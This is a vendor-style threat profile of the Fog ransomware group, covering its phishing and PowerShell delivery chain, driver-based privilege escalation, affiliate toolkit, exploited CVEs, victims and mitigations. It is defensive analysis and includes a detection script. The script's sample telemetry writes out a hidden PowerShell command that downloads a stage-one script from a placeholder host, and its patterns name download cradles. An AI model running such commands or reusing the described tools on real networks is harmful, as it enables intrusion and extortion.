Threat Actor Profile: Fog Ransomware Group

The Fog ransomware group is one of the fastest-growing cybercrime actors, gaining attention for its multi-stage infection chain, broad targeting range, and reliance on affiliates.  

Last observed in March 2025, the group left behind a complex operational footprint that indicates both technical maturity and organized collaboration across multiple campaigns.  

Although their public-facing activity has ceased, the group’s tactics and toolsets continue to inform investigations into affiliated ransomware operators and potential successor entities. 

Initial Access and Multi-Stage Delivery Chain 

Fog campaigns relied heavily on phishing as the primary means of entry. The group distributed emails containing an archive titled “Pay Adjustment.zip”, which included an LNK shortcut disguised to resemble a PDF document. When executed, this shortcut initiated a download sequence that retrieved stage1.ps1, a PowerShell script responsible for triggering the remaining infection stages. 

This script functioned as the centerpiece of the operation. It downloaded additional payloads, including a ransomware loader named cwiper.exe and a privilege-escalation utility known as ktool.exe, and fetched secondary scripts used for reconnaissance and data exfiltration. The same PowerShell command embedded in the script also appeared within the deobfuscated ransom-note text, suggesting that the group relied on multiple vectors that all funneled back to the same staging mechanism. 

Beyond its technical role, stage1.ps1, the primary bootstrapper, contains nonstandard content for ransomware operations: political commentary and commands to open political YouTube videos. This mix of functionality and messaging made Fog campaigns unusual compared to more commercially driven ransomware groups. 

Payload Structure and Anti-Analysis Behavior 

Fog’s payload ecosystem comprises several distinct components. Scripts such as Lootsubmit.ps1 and Trackerjacker.ps1 gathered system metadata, network details, and geolocation information, sometimes through external services like the Wigle API, before sending the results to a remote receiver. The ransom workflow was linked to a Monero payment address, often embedded in a QR code dropped on infected machines. 

Privilege escalation attempts were facilitated through ktool.exe, which deployed a vulnerable Intel driver (iQVW64.sys) to exploit a known flaw. Meanwhile, the ransomware loader embedded an encrypted Fog binary, decrypting it at runtime using a key unique to each variant. To complicate analysis, the loader performed several environmental checks (CPU count, memory size, MAC prefixes, registry markers, and timing anomalies) and halted execution if sandbox indicators were detected. 

During encryption, the malware generated dbgLog.sys, a log file, to record activity and deposited a ransom note named readme.txt. Some variants included intentionally provocative or sarcastic language, referencing fictional agencies such as the “Department of Government Efficiency.” 
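The delivery chain and payload artifacts described above (stage1.ps1 fetched by PowerShell, cwiper.exe, ktool.exe, the iQVW64.sys driver, the Lootsubmit/Trackerjacker scripts, dbgLog.sys) give a defender a concrete set of host-level indicators to hunt for. The following script is an added example, not Cyble's tooling: it scores constructed endpoint telemetry against those indicators per host. The event schema, the indicator weights and the flagging threshold are assumptions, and all sample records are constructed.

```python
"""Hunt constructed endpoint telemetry for Fog chain artifacts named in this
profile. Added example, not Cyble's code; the event schema, weights and
labels are assumptions, and the sample records are constructed."""
import re
from collections import defaultdict

# (label, pattern over image/cmdline/path, weight) - weights are an assumption.
INDICATORS = [
    ("powershell-download", r"powershell.*(downloadfile|downloadstring|invoke-webrequest|iwr|curl).*stage1\.ps1", 3),
    ("loader", r"\\(cwiper|ktool)\.exe\b", 4),
    ("recon-script", r"\\(lootsubmit|trackerjacker)\.ps1\b", 3),
    ("byovd-driver", r"\\iqvw64\.sys\b", 4),
    ("encryption-log", r"\\dbglog\.sys\b", 4),
    ("anydesk-script", r"\\any\.ps1\b", 2),
]
COMPILED = [(n, re.compile(p, re.I), w) for n, p, w in INDICATORS]

def match_event(event):
    """Return the (label, weight) pairs this single event matches."""
    text = " ".join(str(event[k]) for k in ("image", "cmdline", "path") if event.get(k))
    return [(n, w) for n, rx, w in COMPILED if rx.search(text)]

def hunt(events, threshold=6):
    """Sum indicator weights per host; hosts at or above threshold are returned
    with the sorted set of labels that fired. readme.txt alone is deliberately
    not an indicator: the filename is far too common to carry any weight."""
    per_host = defaultdict(list)
    for ev in events:
        per_host[ev["host"]].extend(match_event(ev))
    return {h: sorted({n for n, _ in hits}) for h, hits in per_host.items()
            if sum(w for _, w in hits) >= threshold}

PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [  # constructed telemetry; example.invalid is a placeholder host
    {"host": "WS01", "image": PS, "cmdline": "powershell -w hidden (New-Object Net.WebClient)"
     ".DownloadFile('http://example.invalid/stage1.ps1','C:\\Users\\Public\\stage1.ps1')"},
    {"host": "WS01", "image": "C:\\Users\\Public\\cwiper.exe", "cmdline": "cwiper.exe"},
    {"host": "WS01", "path": "C:\\Windows\\Temp\\iQVW64.sys"},        # driver load
    {"host": "WS01", "path": "C:\\Users\\Public\\dbgLog.sys"},        # file create
    {"host": "WS02", "image": "C:\\Program Files\\AnyDesk\\AnyDesk.exe", "cmdline": "AnyDesk.exe --service"},
    {"host": "WS02", "path": "C:\\Users\\bob\\Desktop\\readme.txt"},  # benign on its own
    {"host": "WS03", "image": PS, "cmdline": "powershell -ep bypass -f C:\\Temp\\any.ps1"},
]

if __name__ == "__main__":
    for host, labels in hunt(SAMPLE_EVENTS).items():
        print(host, labels)
```

Only WS01 crosses the default threshold; WS03, which shows just the AnyDesk automation script, surfaces only if the threshold is lowered, which is the trade-off between early warning and false positives that the weights are meant to expose.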

Affiliate Tools and Open Directory Exposure

Malware Families and Tools Used by the Fog Ransomware Group (Source: Cyble Vision)   

The Fog ransomware operation runs a mature Ransomware-as-a-Service ecosystem. According to Cyble Vision's data, the items stored in the exposed open directory include: 

  • Sliver C2 frameworks 
  • SonicWall VPN credential scanners 
  • Credential dumps associated with stolen VPN access 
  • DonPAPI and Impacket tools for DPAPI theft and lateral movement 
  • Active Directory exploitation tools, including Certipy and Zer0dump 
  • Kerberos/PAC attack scripts associated with noPac and Pachine 
  • AnyDesk installers and automation scripts 
  • Utility tools such as Powercat and Proxychains 

This extensive toolkit allows the Fog ransomware group to run full-scale intrusion operations, including reconnaissance, credential harvesting, persistence, and stealthy pivoting. 

Exploited Vulnerabilities and Campaign Expansion 

Fog operators exploited several notable vulnerabilities during their campaigns. These included: 

  • CVE-2024-40766, an access-control flaw affecting SonicWall SSL-VPN appliances 
  • CVE-2020-1472 (Zerologon) for domain-level compromise 
  • CVE-2021-42278 and CVE-2021-42287, used for Kerberos abuse 
  • CVE-2015-2291, leveraged through the vulnerable Intel Ethernet diagnostics driver 

Additionally, between January and March 2025, Fog-associated actors targeted GitLab environments, exfiltrating source code and releasing it incrementally to pressure victims. Shortly after these incidents, the group's dedicated leak site went offline.  

Global Footprint and Affected Sectors 

Countries Targeted by the Fog Ransomware Group (Source: Cyble Vision)   

Fog ransomware activity extended across a wide geographic range, affecting organizations in regions including Europe, Asia, Africa, and the Americas. Impacted countries include Austria, Australia, Belgium, Brazil, Canada, Germany, Egypt, Israel, India, Mexico, the Philippines, Turkey, the United States, Vietnam, and many others. 

The targeting scope was equally broad. Documented victims span more than two dozen sectors, among them: 

  • Aerospace and defense 
  • Education 
  • Government and law enforcement 
  • Financial services 
  • Healthcare 
  • Manufacturing 
  • Media and entertainment 
  • Technology and telecommunications 
  • Retail 
  • Transportation and logistics 
  • Energy and utilities 
  • Pharmaceuticals and biotechnology 

Victim Activity and Double-Extortion Operations 

Fog operated under a double-extortion model, both encrypting data and stealing sensitive information in order to pressure victims with the threat of publishing the stolen data. The group claimed more than 100 affected organizations. 

One confirmed case involved Waverley Christian College in Australia, which reported a cyber incident in December 2024 after the group claimed theft of several gigabytes of data. Early Fog campaigns concentrated on U.S. schools and recreation centers in mid-2024, but later activity expanded to include financial and commercial entities. 

Conclusion 

Although the Fog ransomware group has shown no confirmed activity since March 2025, its earlier campaigns highlight a technically capable operation that leveraged phishing-based delivery chains, staged PowerShell scripts, privilege-escalation exploits, and a broad affiliate toolkit.  

Whether the group has dissolved or rebranded is still unclear, but its tactics continue to inform current investigations into new ransomware actors. For organizations monitoring similar threats, Cyble’s intelligence resources can support ongoing detection and analysis to strengthen visibility into ransomware activity. Start by requesting an external threat assessment report or scheduling a personalized demo today! 

Recommendation and Mitigation Strategies 

  • Implement strict email security controls to block phishing attachments, especially LNK files disguised as documents, and deploy sandbox inspection for ZIP archives. 
  • Harden PowerShell usage by enforcing constrained language mode, script signing policies, and monitoring for suspicious execution patterns tied to multi-stage loaders. 
  • Patch exposed systems promptly, prioritizing vulnerabilities abused by Fog operators such as SonicWall SSL-VPN (CVE-2024-40766), Zerologon (CVE-2020-1472), and Active Directory privilege-escalation flaws (CVE-2021-42278/42287). 
  • Restrict the use of vulnerable or unsigned drivers and enable kernel-mode driver blocking to mitigate bring-your-own-vulnerable-driver (BYOVD) attacks like those using iQVW64.sys. 
  • Enforce MFA and monitor VPN access logs to detect misuse of stolen credentials and block anomalous authentication attempts. 
  • Deploy endpoint detection and response (EDR) with behavioral rules that can detect staged PowerShell chains, credential harvesting tools, and lateral movement frameworks. 
  • Segment networks and limit administrative privileges to reduce the impact of credential compromise and obstruct lateral movement via tools like Impacket, DonPAPI, and Kerberos/PAC exploitation kits. 

MITRE ATT&CK Techniques Associated with the Fog Ransomware Group 

MITRE ATT&CK Techniques (Source: Cyble Vision)  

  • Valid Accounts (T1078): Fog operators used stolen or compromised SonicWall VPN credentials, identified in sonic_scan.zip, to authenticate into target environments and gain initial access. 
  • Exploit Public-Facing Application (T1190): Affiliates exploited vulnerabilities in exposed services, most notably the SonicWall SSL-VPN flaw CVE-2024-40766, or reused compromised VPN credentials to breach networks through internet-facing applications. 
  • Spearphishing Attachment (T1566.001): Campaigns delivered phishing emails containing the archive “Pay Adjustment.zip”, which held an LNK file masquerading as a PDF; opening it initiated Fog’s multi-stage PowerShell infection chain. 
  • PowerShell (T1059.001): The stage1.ps1 script served as the primary bootstrapper, downloading the ransomware loader (cwiper.exe), privilege-escalation tool (ktool.exe), and various secondary scripts used in later stages. 
  • Malicious File (T1204.002): The LNK file disguised as a PDF relied on user execution to trigger a command that downloaded stage1.ps1, enabling the broader multi-stage deployment process. 
  • Valid Accounts – Persistence (T1078): Fog operators maintained long-term access by repeatedly leveraging stolen SonicWall VPN credentials to re-enter compromised networks. 
  • Windows Service (T1543.003): Persistence was reinforced through automated installation and configuration of AnyDesk, using a PowerShell script (any.ps1) that deployed the service and set up a default access password. 